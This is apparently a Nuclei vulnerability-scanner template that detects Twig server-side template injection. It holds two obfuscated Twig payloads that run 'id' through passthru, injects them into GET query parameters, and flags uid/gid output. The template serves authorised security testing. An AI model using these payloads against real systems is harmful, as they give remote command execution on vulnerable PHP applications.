Twig, a PHP template engine, posed significant challenges in crafting a working payload due to its built-in and default configurations, particularly in string creation. However, by utilizing the block feature and the built-in _charset variable, Attacker successfully developed a payload by nesting these elements together.
PoC代码[已公开]
id: twig-ssti
info:
name: Twig - Server Side Template Injection
author: ritikchaddha
severity: high
description: |
Twig, a PHP template engine, posed significant challenges in crafting a working payload due to its built-in and default configurations, particularly in string creation. However, by utilizing the block feature and the built-in _charset variable, Attacker successfully developed a payload by nesting these elements together.
reference:
- https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation
metadata:
max-request: 1
tags: twig,ssti,dast,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- "{%block%20U%}id000passthru{%endblock%}{%set%20x=block(_charset%7Cfirst)%7Csplit(000)%}{{[x%7Cfirst]%7Cmap(x%7Clast)%7Cjoin}}"
- "{{id~passthru~_context%7Cjoin%7Cslice(2,2)%7Csplit(000)%7Cmap(_context%7Cjoin%7Cslice(5,8))}}"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
skip-variables-check: true
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a0047304502203df49907603c316f0f529b945a7172647945eae6b34778b12d061bc04881f02a022100918e3630ae50e5face04ff0943a357b3af2fcbc228c2dc1c3c9ac5e2579281cc:922c64590222798bb761d5b6d8e72950